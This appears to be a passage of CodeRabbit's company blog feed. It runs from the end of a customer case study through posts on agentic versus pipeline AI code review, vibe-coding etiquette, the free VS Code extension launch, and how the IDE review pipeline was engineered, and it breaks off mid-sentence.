time-saver. *“With CodeRabbit, AI-generated summaries give me instant context and the visual file structure helps me spot critical changes quickly,”* Sriram explained. *“These made it much easier to review changes quickly and catch critical issues without going through every file manually.”* That alone shaved hours off their daily reviews. ### **Early issue detection** Like with most small teams, Plane has to balance rapid iteration with stability and scalability – something that is harder to do if you’re always responding to issues in production or when the codebase has significant tech debt. AI code reviews helped considerably: *“Automated reviews catch issues early, improving both speed and code quality,” shared Sriram.* With CodeRabbit, issues they might have missed before—including security vulnerabilities, logic errors, or concurrency pitfalls—were flagged right away\*.\* This proactive approach reduced the chance of shipping bugs into production. ### **Faster, more efficient workflows** Plane’s workflow improved dramatically because CodeRabbit goes beyond traditional static analysis by understanding context behind code changes and leveraging the advanced reasoning of generative A *“AI changed the game by accelerating reviews, providing better context, and catching issues early, making the entire workflow more efficient,” Sriram shared.* ### **Set up in minutes** Implementing CodeRabbit was a breeze for Plane, which meant the team was able to start seeing value right away. *“The setup was seamless—we configured CodeRabbit in just a few minutes, and the bot started reviewing our PRs instantly,”* Sriram explained\*. “It fit right into our workflow without any friction.” ## **The results: Quality code, shipped faster** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/9f2c108e6568b534f046f7cbad4a33265c95091aeafb7c2a90ba3b796c094d83_8cfebb54d7.png) Once CodeRabbit was fully in place, Plane saw quick improvements to their process: ### **Significantly decreased code review time** “*PR review time has significantly decreased, improving deployment speed,”* shared Sriram. Code reviews that used to take hours were now completed in a fraction of the time. CodeRabbit customers generally see a **50% reduction** in overall review time. ### **Fewer bugs reaching production** By catching issues at the PR stage, the Plane team saw notable reductions in post-release fixes\*. “Fewer bugs make it into production thanks to early issue detection,”\* explained Sriram. Across our customers, CodeRabbit **catches an average of 90%+ of all bugs and errors.** ### **Faster merge cycles** With better context and fewer open questions, the team were able to merge PRs faster – and not fall behind on their release schedule. “*We now spend less time on back-and-forth and more time shipping quality code,”* explained Sriram. While results vary from team to team, CodeRabbit customers see an average of **4x faster PR merges.** ### **Improved developer productivity** Less back-and-forth in PR discussions and less time on manual code reviews has allowed engineers to focus on building rather than reviewing. For that reason, Sriram believes CodeRabbit is essential for any development team. After all, *“developer productivity is crucial for any organization,”* he shared. ### **Immediate impact** Plane started seeing value almost immediately—with faster reviews, better PR context, and improved collaboration. *“CodeRabbit has sped up reviews, improved visibility, and helped catch issues early,”* Sriram shared. ## CodeRabbit = No more code review bottlenecks By implementing CodeRabbit, Plane successfully tackled the code review bottleneck that had slowed their team’s momentum. They’re now shipping features faster, collaborating more effectively as a team, and maintaining a high standard of code quality. As Sriram puts it: *“Code reviews are no longer a bottleneck. AI-driven insights help us catch issues early, and the team can focus more on writing better code rather than spending excessive time reviewing. The overall workflow is smoother and we ship faster with more confidence.”* Want see how CodeRabbit can help your team? [Get a 14-day trial.](https://coderabbit.link/Mz8rjrT)

Pipeline AI vs agentic AI for code reviews: Let the model reason — within reason

David Loker — Thu, 29 May 2025 00:00:00 GMT

AI has changed what code reviews can be. We’ve gone from static rules and regex-based linters to systems that can actually read a diff and respond with feedback that resembles what a senior engineer might say. That’s real progress. But as companies like CodeRabbit create production-grade systems for code reviews or for other developer-focused tools, we all face a core architectural question: **Do you give the AI autonomy to plan and act like an agent? Or do you structure the process as a predictable AI pipeline?** This choice affects more than just implementation. It shapes how fast your system runs, how much developers trust it, how you debug it when it breaks, and what it takes to maintain it long-term. And while the architecture matters, it's not the end goal. These are just different ways of trying to answer the same underlying question — *How do we give the model everything it needs (and nothing more) to deliver the best code review possible?* That’s the real challenge. Not "agentic AI" vs. "pipeline AI." Just building the best possible tool for the people who use it. We’ll come back to that. But first, let’s define the two camps. ## **AI architectural patterns: Agentic AI vs. pipeline AI** ### **Agentic AI systems** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b6dd24757651b7110b343ddb043b90423f2af80fbf2daf043082f622c14194e5_f065cc35f1.png) In an agentic architecture, the model isn’t locked into a single prompt. It’s allowed to think step-by-step, make decisions, and use tools as it goes. Often this means: * Planning a course of action * Calling a tool (e.g. grep, a static analyzer, test runner) * Observing the output * Deciding what to do next This approach — often referred to as **ReAct (Reason + Act)** — is one of several reasoning patterns used to guide agent behavior. It shows up across a range of modern systems and research prototypes, but the core idea is the same: the model can reason, act, observe, and repeat — using external tools and memory to enrich its output. That flexibility is incredibly promising. It’s also incredibly hard to get right. ### **Pipeline AI systems** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e84602517a67381d106c30fee1e8839e12f101f30320df067a0287281c1f4d16_326a71114d.png) Pipeline AI-based systems take a more deterministic approach. You define a sequence: 1. Prepare inputs (e.g. diff, relevant file slices, issue text) 2. Run pre-processing (e.g. static analysis, code search) 3. Call the model with a crafted prompt 4. Post-process the output into review comments This approach is predictable, fast, and easy to test. It’s also easier to integrate into CI workflows, where speed and reproducibility matter. Many tools use a pipeline AI backbone as their foundation, however, most modern implementations also incorporate elements of agentic behavior. They may dynamically adjust prompts, use retrieval strategies, or support interactive review flows. They aren’t fully agentic, but they aren’t rigidly linear either. Which brings us to the reality most teams face: you don’t have to pick a side. Most real-world systems live somewhere in the middle — not for philosophical reasons, but because that’s what it takes to ship something reliable, adaptable, and useful. ## **Hybrid AI systems: A spectrum, not a binary** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/98276c5b4655f2b468dba375d4f58e869591e78b76acf1978651db7a4196d7a9_4fcda9bb89.png) In practice, many real-world systems don’t land fully in either the agentic AI or pipeline AI camp. They blend elements of both — taking the structure and reliability of pipelines, and layering in tool use, learned behavior, or context enrichment strategies that are often associated with agents. [**CodeRabbit**](https://cloud.google.com/blog/products/ai-machine-learning/how-coderabbit-built-its-ai-code-review-agent-with-google-cloud-run) is a good example of this kind of hybrid AI architecture. [GitHub Copilot PR Reviews](https://github.blog/changelog/2025-04-04-copilot-code-review-now-generally-available) also falls into this category. While their interfaces and goals differ, they share similar DNA — blending structured inputs with retrieval, static analysis, and interactive flows. We go deeper into CodeRabbit’s AI pipeline and enrichment strategy in the next section, but in short: it blends the determinism and predictability of pipelines with dynamic, learned behavior and targeted context augmentation — sitting squarely between the two paradigms. Hybrid AI systems like this sit along a spectrum — and that's the point. You don’t have to go all-in on one paradigm. You just have to solve for what matters: helping your users make better decisions, faster, with fewer surprises. Hybrid systems aim to balance the pros and cons of both agentic and pipeline systems by finding a balance between the two. Striking the right balance can also be difficult to achieve, with some experimentation required. This added control and flexibility can increase the cost of development and maintenance. ## **Tradeoffs between AI architecture patterns** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/5d7a51eface2d67beba539aa45900cae4a78f4d046b4fd63b6263e2b54d6c836_d40afdb7f6.png) | **Dimension** | **Agentic systems** | **Pipeline systems** | | --- | --- | --- | | **Latency** | Multi-step, often slower | Fast, predictable | | **Tool Use** | Dynamic and adaptive | Static and consistent | | **Trust** | Harder to test, less predictable | Easier to debug and validate | | **Context Handling** | On-demand, but error-prone | Predefined and controlled | | **Workflow Fit** | Interactive tools | CI/CD and production PR reviews | Agentic AI systems offer flexibility — but flexibility is a double-edged sword. They can fetch exactly what’s needed… or fetch everything and drown in noise. They can reason step-by-step… or loop forever. You need good defaults, good tools, and often, some level of hard constraint. Pipelines, by contrast, are stable. You get speed, control, and a well-bounded behavior space. But they can be rigid. If the context isn’t there at the start, the model can’t do much about it. That’s the tradeoff. And that’s what most of us are doing here — not debating abstractions, but working to build the best damn tool we can. For ourselves. For our teams. For the developers who need to ship something today. The AI architecture pattern you use is just a means to an end. The real work — and the real leverage — lies somewhere else. ## **AI context is the real bottleneck: Why autonomy needs structure** ### **More context isn’t always better** In AI code review, we spend a lot of time debating architecture — agentic AI vs. pipeline AI — but the real performance bottleneck is often upstream: **what context we give the model**. There’s a common assumption: *If we just add more AI context — more code, more metadata, more analysis — the model will perform better.* But that’s not how it works. * Too much irrelevant input overwhelms the model ([Secure Code Review at Scale](https://github.com/247arjun/ai-secure-code-review/blob/main/Automated%20Secure%20Code%20Review%20at%20Scale%20Using%20Static%20Analysis%20and%20Generative%20AI.md#:~:text=Another%20lesson%20learned%20is%20that,be%20a%20very%20subjective%20measure)) * Prompt noise leads to muddled reasoning and false positives ([Secure Code Review at Scale](https://github.com/247arjun/ai-secure-code-review/blob/main/Automated%20Secure%20Code%20Review%20at%20Scale%20Using%20Static%20Analysis%20and%20Generative%20AI.md#:~:text=LLMs%20tend%20to%20hallucinate%20far%20less%20when%20analyzing%20a%20specific%20code%20snippet%20or%20diff)) * Even high-quality tools can generate low-quality AI context if used indiscriminately ([Anthropic Case Study](https://www.anthropic.com/customers/coderabbit#:~:text=assurance%20processes%20requiring%20multiple%20specialized,dependent%20vulnerabilities)) More isn’t better. **Better is better.** ### **Agent autonomy sounds great — but struggles in practice** Agentic systems promise flexibility: let the model decide what it needs, when it needs it, and fetch context accordingly. In theory, this is ideal. In practice, it’s messy. Common failure patterns: * Tool overuse — agents calling everything, just in case ([DevTools Academy)](https://www.devtoolsacademy.com/blog/coderabbit-vs-others-ai-code-review-tools/#:~:text=unnecessary%20things%20$there%20were%20cases%20of%20early%20AutoGPT%20agents%20doing%20redundant%20web%20searches$) * Redundant or noisy fetches that dilute the prompt ([Prompt Engineering Guide](https://www.promptingguide.ai/research/llm-agents#:~:text=overhead%20and%20sometimes%20unpredictability%20if%20the%20agent's%20prompt%20isn't%20tightly%20controlled)) * No clear reward signal to distinguish helpful context from useless output ([ReTool](https://retool-rl.github.io/#:~:text=optimal%20strategies%20for%20leveraging%20external,with%20significantly%20fewer%20training%20steps)) Agent autonomy without structure doesn’t scale. ### **At CodeRabbit, we curate context — we don’t wander** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/973c235f38802f296562123ebf7c9197ad3e7da34c0387d4243c32691ffa43c6_0cb1984763.png) We’ve taken a different approach. CodeRabbit’s system: * Runs [30+ static analyzers](https://cloud.google.com/blog/products/ai-machine-learning/how-coderabbit-built-its-ai-code-review-agent-with-google-cloud-run#:~:text=3,20%2B%20linters%20and%20security%20scanners) *before* prompting the model * Uses **AST and symbol lookups** to identify relevant context * Applies context filters based on [past review learnings](https://www.anthropic.com/customers/coderabbit#:~:text=CodeRabbit%20leverages%20Claude%20to%20deliver%3A) * Structures inputs carefully to fit model limits and prompt constraints This hybrid AI pipeline gives the model exactly what it needs — and nothing more. No random guesses, no runtime surprises. We’ve learned that great reviews come from: * Tight, relevant context * Consistent structure * Just enough flexibility to adapt to the code change at hand ### **Could agents learn to curate context?** Maybe — and that’s the interesting future path. If we had: * A dataset of pull requests with “ideal context sets” * Evaluation metrics tied to actual review outcomes * Synthetic examples showing what helps and what hurts... ...then we might be able to train agents to call tools intelligently. To act more like great reviewers than interns with shell access. That’s the direction explored by recent work like [ReTool](https://retool-rl.github.io/#:~:text=optimal%20strategies%20for%20leveraging%20external,with%20significantly%20fewer%20training%20steps) and [LeReT](https://arxiv.org/abs/2410.23214#:~:text=topics,Project%20website%3A%20this%20http%20URL), which use reinforcement learning to teach agents retrieval strategies — learning which tools to invoke and when, based on feedback loops tied to downstream task quality. ReTool showed improvements in task accuracy of up to 9% over retrieval-agnostic baselines, and required significantly fewer training steps to converge. LeReT similarly demonstrated a 29% boost in retrieval success and a 17% gain in downstream QA accuracy over standard retrievers — strong early signals that agents can, in fact, learn to fetch the right context when properly trained. But even with these improvements, we’re still lacking high-quality, domain-specific datasets for tasks like code review. One path forward could involve curating a large-scale benchmark of real and synthetic pull requests, each labeled with: * The issue or defect type present (e.g. logic bug, perf regression, missing test) * The AI context types that improve or degrade LLM performance on detecting that issue (e.g. AST, file diff, related function definitions, ticket description) * The tool invocations used (or simulated) to assemble that context With this dataset, we could: * Evaluate which types of PRs benefit from which types of context * Train agents to learn context selection policies based on PR characteristics * Create specialized sub-agents for different error classes (security, style, performance), each using context proven to enhance detection of those issues In other words: teach agents to reason more like experts — not just by copying what they say, but by emulating how they gather, filter, and apply the information that matters. And we wouldn't have to guess at it. We could back it up with data. That’s the deeper opportunity: not just training agents to run tools, but to understand **why** and **when** to use them — grounded in evidence, driven by outcomes. We’re not there yet. But the path is starting to look clearer. And at CodeRabbit, we’re leading the charge. This is exactly the frontier we’re investing in: building hybrid AI systems that can predict the right tool to use, at the right time, for the right kind of review. Not just to make something clever — but to make something teams can trust. ## **Our hybrid AI pipeline: We reason with purpose** By now, it should be clear that "agentic AI vs. pipeline AI" isn’t the real battle. These are just architectural tools — different shapes we use to tackle the same core problem: *How do we give the model exactly what it needs to deliver a useful review — and nothing that drags it off course?* Pipeline AI systems give us speed, control, and consistency. Agentic AI systems promise adaptability and richer reasoning. And hybrid AI systems, like what we’ve built at CodeRabbit, try to walk that line — combining structure with flexibility, precision with power. But no matter how you structure it, one thing matters above all: **context**. The hard part of code review — for both humans and machines — isn’t the format. It’s knowing where to look. What matters. What can be ignored. What’s risky. What’s surprising. That’s what great engineers learn to spot, and it’s what we’re trying to teach our models to do. That’s the exciting part. Because if we can train a system to not just analyze a diff, but to **know which tool to call, when to call it, and how to interpret its output with surgical precision** — then we’re getting closer to something remarkable. Not just automation. But **reviews that feel like they came from your best engineer** — on their best day — every time. That’s what we’re building toward. Not for the sake of cleverness, but because that’s what teams need: trustworthy tools that help them move fast, write better code, and ship with confidence. We’re not done. But we’re getting closer. ***Interested in trying out CodeRabbit’ reviews?*** [***Get a 14-day trial!***](https://coderabbit.link/yzOslzy)

How to vibe code at work without your colleagues hating you

Emily Lint — Mon, 26 May 2025 00:00:00 GMT

It seems like [vibe coding is everywhere](https://fortune.com/2025/03/26/silicon-valley-ceo-says-vibe-coding-lets-10-engineers-do-the-work-of-100-heres-how-to-use-it/) these days. It’s become the latest developer trend— fueled by Twitter threads about people vibe-coding entire startups in a weekend. While it can be fun to vibe code your hobby projects — you might feel tempted to bring that chaotic, spontaneous AI-powered energy into the workplace. Be warned: your teammates probably won’t share your enthusiasm when they're forced to review massive, confusing, and buggy code dumps. To illustrate this problem for all those tempted to ‘vibe’ at work, we created a comic. *The Vibes Are Off* features Zig, the office vibe coder, submitting an enormous PR to his beleaguered colleague, Grumpster. Poor Grumpster spends two soul-crushing days cleaning it up, only for the CTO to publicly praise Zig for saving a few hours coding. Grumpster? Well, he’s left quietly dying inside. **Read it here:** pdf='[https://victorious-bubble-f69a016683.media.strapiapp.com/Harecompressed\_910f61fa09.pdf](https://victorious-bubble-f69a016683.media.strapiapp.com/Harecompressed_910f61fa09.pdf)' At CodeRabbit, we don’t think that code reviews should cause anyone to begin a decades-long quest for vengeance. That’s why we’re launching a **Code Review Etiquette** series. Our first order of business? Prevent vibe coders from becoming the most hated developers at their companies. ## **Edit your code, don't just vibe & pull request** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/37562852f401b3e52f70e4cb3d1c15f5a7e9dd81650ab94502a7cd26eb37ed5d_738af320d1.png) Look, we get it. It feels amazing to watch your AI coding assistant spit out an entire app from a vaguely worded prompt. But we beg you: don’t commit it straight into your PR. AI-generated code is notoriously verbose and loves sprinkling in little surprises like pointless loops or imaginary functions that don’t exist in your libraries. Take the time to actually read the AI’s output before passing the pain onto your teammates. And once you’re done? Read it again. And then read it *yet another* time. Refactor awkward functions, clean out those random bits of nonsense, and check whether your assistant hallucinated APIs (it happens more than you think!). In other words, do the minimum required to ensure that your colleagues won't wish you ill. This way, your colleagues won’t dread seeing your PR pop up – and you might just avoid becoming the reason they DM each other vibe coding memes. ## **Avoid *ginormous* PRs** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/4d02a826b54bfa0961f80ad3cc22aa87224f8ab1eb9553b39c303c88b33aa2b9_4017fa8567.png) Nothing sparks immediate workplace rage like a PR that reads “+11,374, -3.” If your AI assistant just handed you a PR that could rival the length of *War and Peace*, you've officially violated every known rule of code review etiquette. The developer equivalent of [Emily Post](https://en.wikipedia.org/wiki/Emily_Post) is now *very* mad at you. Massive PRs aren’t just annoying—they guarantee that reviewers will miss important issues and send bugs into production. Instead, split your vibe-coded masterpiece into smaller, digestible pieces. You know, like you’d want to receive it. Even if the AI assistant gave you the entire feature in one go, be kind and break it into logical chunks before subjecting your colleagues to a review so endless that it will leave them feeling like they’re in a Black Mirror episode where time has somehow looped. Trust us, your teammates will appreciate the effort and you’ll spare yourself some passive-aggressive comments or an immediate ‘Request Changes.’ ## **Ensure your code meets org style and standards** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c652468e5f238af14fcc5e3ef101c40b37e3b56b326146a2520a18bd392f7646_3c17d29a93.png) Your organization’s style guide and coding standards aren’t just ‘suggestions.’ Just because the AI you vibe-coded with decided camelCase and snake\_case look beautiful together doesn’t mean your colleagues agree. Leaving style issues for your reviewers to clean up is a sure way to build resentment faster than npm builds node\_modules. Make sure your vibe-generated code matches the established style. Yes, it might be boring. Yes, it takes slightly more time. But remember, your colleagues didn’t sign up to debug your assistant’s latest avant-garde variable naming schemes. ## **Get AI to review in your IDE** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f6f7ed9b59e5412c50cb4222cf49769099503c6387d9e6b9933ad2c9e83d82bb_4f94df54bb.png) If you insist on vibe coding, then at least have the decency to enlist an AI assistant to do the heavy lifting of cleaning up your code first. At CodeRabbit, we now offer [AI-driven reviews right inside your IDE](https://coderabbit.link/nTSFnhG) (and for free too!). It will catch embarrassing bugs, obvious mistakes, and nonsensical logic that you might miss. And all before a human reviewer even sees it and adjusts their opinion of you down a few notches. Running these preliminary reviews shows respect for your teammates’ time. It’s the ultimate act of empathy: a robot criticizing you now so your colleagues won’t have to later. And if you just really enjoy passive aggressive comments from annoyed developers for some reason, don’t worry! You can [customize CodeRabbit’s tone](https://x.com/coderabbitai/status/1925196149616529882) to add comments in the same frustrated tone your teammates would! ## **Warn your colleagues (& thank them after)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/bb24d2c9a66e8561644f1ac9ef0482ed27543e0a75698d84c5bc50e69c9934b9_1958dced19.png) If you’re going to unleash AI-generated code into your teammates’ lives – you might want to at least warn them in advance. A quick Slack message saying something like, “Heads up, vibe-coded PR incoming!” lets your team brace themselves mentally (or emotionally). You can even add a few sheepish emojis. We suggest these: 🫣🫠😳. Even better, acknowledge upfront that your PR might contain more WTFs than usual. After your colleagues spend hours untangling your AI’s bizarre logic (or less time if they *also* enlist an AI reviewer like CodeRabbit to do a first pass), don’t forget to thank them – even if it’s just in grateful replies to their frustrated comments. Gratitude goes a long way toward smoothing over any vibe-induced frustration. ## **Code review best practices: Vibe responsibly!** Vibe coding is here to stay – at least as long as AI tools keep getting smarter and developers keep writing multi-part threads on social media. While there’s nothing wrong with experimenting and having fun, your teammates shouldn’t have to suffer for your AI-assisted sins. If you follow these basic etiquette rules – editing and reviewing before committing, respecting your company’s standards, and warning people before you drop an AI-fueled PR bomb—you might just avoid becoming the most hated dev at your company. Plus, you’ll actually end up producing better code! Or you could ignore all this advice, keep vibe coding recklessly, and earn yourself a starring role in your office’s most pointed private jokes. But don’t say we didn’t warn you. *Want to sign up for* ***free*** *code reviews in VS Code, Cursor, or Windsurf?* [*Go here!*](https://coderabbit.link/nTSFnhG)

CodeRabbit for VS Code Is Here — Free AI Code Reviews

Sahil Mohan Bansal — Wed, 14 May 2025 00:00:00 GMT

We’ve got exciting news to share! CodeRabbit’s AI code reviews are now delivered [directly within VS Code](https://coderabbit.ai/ide) and its forks including Cursor and Windsurf. And **code reviews in the IDE are completely free**! With this extension, we focused on building the best quality reviews in the IDE so that we can identify more bugs and issues for you than existing review tools. This brings CodeRabbit directly into your development workflow – making it much easier to incorporate our review feedback in your code. To get started, simply install the CodeRabbit plugin in any VS Code fork. We will then review every commit, identify most bugs before the PR is raised, and help you ship code faster. [![AI code reviews in IDE](https://victorious-bubble-f69a016683.media.strapiapp.com/548bef71413aef8793ca799c76470c3792a798049204a8e40676e0c1128f84d5_a170894cd7.png)](https://coderabbit.ai/ide) *Free AI code reviews in VS Code, Cursor and Windsurf* At CodeRabbit, we believe that the best tools fit seamlessly into your existing workflows. With our AI code reviews coming into Cursor and Windsurf, developers can now get code reviews done without breaking their flow state. ### Benefits of AI code reviews in IDE Code reviews in the IDE are a great way to: * Automate first pass of code review right as you’re coding. * Quickly catch and fix any issues right in your IDE. * Reduce back-and-forth at the PR stage, helping you ship faster. * Help you raise pull requests with greater confidence – and fewer bugs. This multi-layered approach – with reviews in both the IDE and the Git platform – helps developers catch more bugs and reduce review time. Ultimately, code reviews are necessary in both places and deliver complimentary benefits. With reviews in the IDE, developers get a first pass review right as they are coding. With reviews in the Git platform, the entire team’s code is reviewed in a centralized manner, making it easier to catch issues that may creep in when all the commits come together. This helps individual developers get faster feedback in their code editor – while also maintaining a centralized governance structure across the team. [![Code reviews in IDE and in PR](https://victorious-bubble-f69a016683.media.strapiapp.com/192d756029a510cd18d884237948dc601cf3b3b176ef339e50262bb56f5150d3_e981240559.png)](https://coderabbit.ai/ide) *Code Reviews in the IDE and in the PR* ### Vibe code with confidence One of the key challenges we hear from developers is how AI coding agents can leave defects behind that are hard to catch. These AI code gen tools are not always able to catch defects in the code they generated. This is why having a second, independent set of eyes is critical to ensure that bugs are caught before they end up in production. Here’s how CodeRabbit works in the IDE: 1. **Inline code reviews:** Each line of code gets senior developer level attention with AI-powered inline review comments. CodeRabbit becomes your pair programmer, within the code editor. [![Line by line code reviews in VS Code](https://victorious-bubble-f69a016683.media.strapiapp.com/79aedb23b2af56736a4cf96448c79c83ed2d5bce7cb0a13903e214277840307f_98e35d30ef.png)](http://coderabbit.ai/ide) 2. **Built for flow, not friction:** Code, review, commit - without breaking your flow state. CodeRabbit reviews every committed and uncommitted change, making your dev workflow faster. [![review committed and uncommitted changes](https://victorious-bubble-f69a016683.media.strapiapp.com/e5e018dccfa9eccafa4c56249021d0f25b060f9c5ea5ca1d23fc9824f2ddfc2b_d1cef66da9.png)](https://coderabbit.ai/ide) 3. **Fix-with AI:** Some review suggestions are simple and can be incorporated by using “One-Click Fix” to apply changes instantly. For more complex feedback, our “Fix with AI” feature hands off CodeRabbit’s review comments with associated context to your preferred AI coding agent. [![Fix with AI](https://victorious-bubble-f69a016683.media.strapiapp.com/7a5a9835760693a8ebcfb012065827fa566c005299738011396884a3bdd995fd_b5ffb6ab7c.png)](https://coderabbit.ai/ide) 4. **Fork-compatible and language agnostic:** Our VS Code plugin supports all VS Code forks including Cursor and Windsurf. Also, all commonly used languages are supported such as Java, Javascript, PHP, Python, Typescript, Go, Ruby and many more. ### IDE reviews are a lightweight, faster version of our PR reviews Our free reviews in the IDE are done by a lightweight version of CodeRabbit that delivers feedback instantly and catches most bugs. For production use-cases, we recommend using the full version of CodeRabbit that also reviews code in the PR, in addition to reviews in the IDE, and comes with additional features that includes additional context from several sources during the review process. Check out the technical details of how we adapted our PR reviewer for [instant reviews in the IDE](https://www.coderabbit.ai/blog/how-we-built-our-ai-code-review-tool-for-ides) Note that the rate limits for reviews in IDE will be lower than rate limits for reviews in PR. For a detailed feature comparison of what is included with reviews in IDE vs reviews in PR, [refer to our documentation](https://docs.coderabbit.ai/code-editors) ### Next Steps Try out CodeRabbit’s free AI code reviews in VS Code, Cursor or Windsurf, we’d love to hear your feedback. Setup takes just a few minutes. Here are some additional resources to help get started: * [Install the VS code plugin](https://marketplace.visualstudio.com/items?itemName=CodeRabbit.coderabbit-vscode) * [Watch demo video](https://coderabbit.link/vscode-demo) * [Share feedback on Discord](https://discord.gg/coderabbit) * [Contact Sales for higher rate limits](https://www.coderabbit.ai/contact-us/sales)

How we built our AI code review agent for IDEs

Amitosh Swain — Wed, 14 May 2025 00:00:00 GMT

At CodeRabbit, we recently shipped our [free VS Code extension](https://coderabbit.link/rxv5kZ8), bringing context-rich AI-powered code reviews directly into your editor. Our engineering philosophy has always been simple: we build tools that fit seamlessly into your existing workflow. While developers have told us our [comprehensive PR reviews](https://docs.coderabbit.ai/) have helped them ship faster and keep more bugs from production, many also asked for [IDE reviews](https://coderabbit.link/ozj7K45) to help check code prior to sending a pull request. By creating another review stage within VS Code (and compatible editors like Cursor and Windsurf), we've minimized disruptive context switching, allowing developers to catch logical errors and embarrassing typos before they ever send a PR. In our dogfooding, our team has found it helps catch issues early and reduces the iterative back-and-forth that can slow down teams at the pull request stage. One engineering challenge we faced when designing IDE reviews was re-engineering our code review pipeline to meet developers’ expectations for instant reviews in their IDE. In this post, we’ll share how we thought through this shift and what steps we took to ensure high-quality reviews while reducing the time-to-first comment by ~90%. ## Transforming CodeRabbit’s typical code review pipeline ![Architectural diagram for CodeRabbit's PR reviews](https://victorious-bubble-f69a016683.media.strapiapp.com/534744cceae3f36b5051ce068d5574fa7687e28646fa705fab1baf995033e18e_15791e0be8.png) Because CodeRabbit initiates a review immediately after a PR is sent, we optimized our PR code review process for the most helpful reviews and send a notification to the reviewer when our review is completed. That process takes several minutes and involves a complex, non-linear pipeline that pulls in dozens of contextual datapoints for the most codebase-aware reviews. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/04d9848d9c9b2c9200c6dbb07a6fa581f76063f4a9a627f27980ad6432f8eead_4459d44ec2.png) We then subject all recommendations to a multi-step verification process to validate that each suggestion will actually be helpful in order to ensure our reviews have as little noise as possible. This involves multiple passes where we identify how parts of the codebase and changes fit together to look for issues before also processing and verifying each suggestion separately. During this process, we don’t share any of those suggestions with the user but wait until we’ve completed all steps in the pipeline in case we find that a suggestion might not be useful. This approach creates a sophisticated, non-linear review graph that is batch delivered to minimize noise. However, users receiving a PR are unlikely to act on it immediately so the processing time isn’t noticed. In that case, it makes sense to bias for quality over speed. But it’s different with IDE reviews. In the IDE, the user expects that reviews will start instantly and be delivered quickly since they might be waiting for the review before sending a merge request. They want to start working on changes immediately. To create an IDE review that better fit user expectations, we needed to adjust how we approached reviews for that context – without impacting review quality or usefulness. ## Balancing quality and speed ![](https://victorious-bubble-f69a016683.media.strapiapp.com/70b001e3d8fb10ec4af38e6702b4c2af17567ba0741f47abd5a8f40e685514eb_ac4159d67a.png) Developing a streamlined pipeline able to deliver near real-time feedback directly within your coding environment required that we restructure how events and review comments were both created and transmitted. This process started by thinking intentionally about the affordances around creating valuable insights in real-time. Real-time reviews would make it impossible for every comment to go through our verification steps to ensure its relevance. But removing those steps from our pipeline would lead to noisier reviews and a higher proportion of unhelpful suggestions. At what point would the ratio of signal-to-noise make an AI code review more of a nuisance, than a help? Since we also offered a solution at the PR stage, we could make our IDE reviews narrowly focused on what mattered most at that stage. We decided that anything that was architectural or required deeper verification with the full codebase was better suited for the PR stage since trying to deliver valuable insights around that would require multi-step validation and take too long. In our PR reviews, we even go so far as to check code by attempting to run it in our sandbox. But that would be impossible in real-time. We decided instead to prioritize reviewing for mistakes, specification alignment, bugs, and logical issues that a developer might miss while coding or editing. Since those are the type of things that could require a PR be sent back for changes or make your colleagues question *how you could have missed it*, we saw these as the most critical issues to look for in the IDE. For example, in my own use of our IDE reviewer, it found a conditional that I changed by mistake and didn’t notice. We also still wanted to have a verification process that would validate that any suggestions we made would be beneficial but needed to build a more lightweight process for doing so. Our goal was to develop the best IDE reviews but we knew they didn’t need to be as comprehensive as our PR reviews. The goal of IDE reviews is to streamline the PR process with an IDE check to help devs tackle the most critical changes and merge more confidently. At which point, the code would undergo our more in-depth PR review. ## How we engineered it ![](https://victorious-bubble-f69a016683.media.strapiapp.com/85a02749809bfc8602dd73c73c8ac4abb8a8f93d74d7e28da412a554ca43db4b_ef9d424ae0.png) Here’s how we tackled developing a new pipeline for our IDE reviews. ### Review processing and delivery One of the biggest changes we made was to how we process and deliver reviews. While in the SCM, we process all suggestions together and wait until we’ve completed our review before delivering the results to users, in the IDE we opted to deliver suggestions iteratively in real-time as our pipeline created them. While we could have opted for a more superficial review and delivered the complete results faster, we wanted to balance comprehensiveness and quality with the user’s need for instant feedback. By sharing suggestions over a longer period of elapsed time, we were able to buy extra time to include additional steps in the process to improve the quality of the suggestions. Because we opted to engineer our system in this way, that also meant that CodeRabbit was able to give continuous feedback as you code using the same review process and pipeline. ### Context preparation ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a62dc20fe4b6de15507a0bcf0e7a30822ac999c04b2a59db4e3509ef44841562_3b65f1e7d8.png) Context enrichment is a big part of how we deliver the most codebase aware and relevant recommendations. However, our context preparation process is extremely comprehensive for our PR reviews. We go so far as bringing in linked and [past issues](https://docs.coderabbit.ai/guides/linked-issues), cloning the repository, and even building a [Code Graph](https://docs.coderabbit.ai/integrations/code-graph-analysis/) of your codebase to analyze dependencies. That kind of context enrichment wasn’t possible in the IDE. Instead, we focused on the code primarily to keep the context lighter for a faster review. In the future, we are also planning on adding user-specific Learnings similar to how we do [org-level Learnings](https://www.youtube.com/watch?v=Yu0cmmOYA-U) for teams. That will ensure that code reviews will improve in relevance over time as the agent learns from your past commits and feedback. ### Prompt and model optimization Despite rearchitecting our pipeline to be more linear and to cut down on steps, we didn’t alter the multi-model orchestration that we use for our PR reviews. We use the same orchestration of models for both kinds of reviews but we created different choices of weights to intelligently select the models to process different parts of the review. We also finetuned how our decisioning engine worked to create a more linear process flow. Finally, we optimized our prompts for faster response times and the different priorities we’d identified for IDE reviews. ### Choosing non-streaming LLM responses over streaming responses We first thought streaming responses—generating words one by one from a language model like in ChatGPT—would be ideal for our IDE reviews, especially since it’s popular for real-time tasks. But because our prompts are large and we perform significant context engineering before starting our reviews, we ran into problems like garbled output from the model and missing tool calls. Users expect review comments to be complete, unlike casual chats with AI coding assistants. So, we have to clean up the model’s output before showing it. Since streaming models their output in chunks, we had to buffer the LLM output until the model generated a full comment before sending it through our processing pipeline. This delay meant streaming didn’t help much in our case. Instead, we chose to wait a bit longer to get complete outputs for a bunch of files simultaneously. ### UI changes ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d4b934f4725ddc64ed6b7d342e69460744d25131a9da4bd528dd3c1f84643192_02bbe29f1b.png) We had to 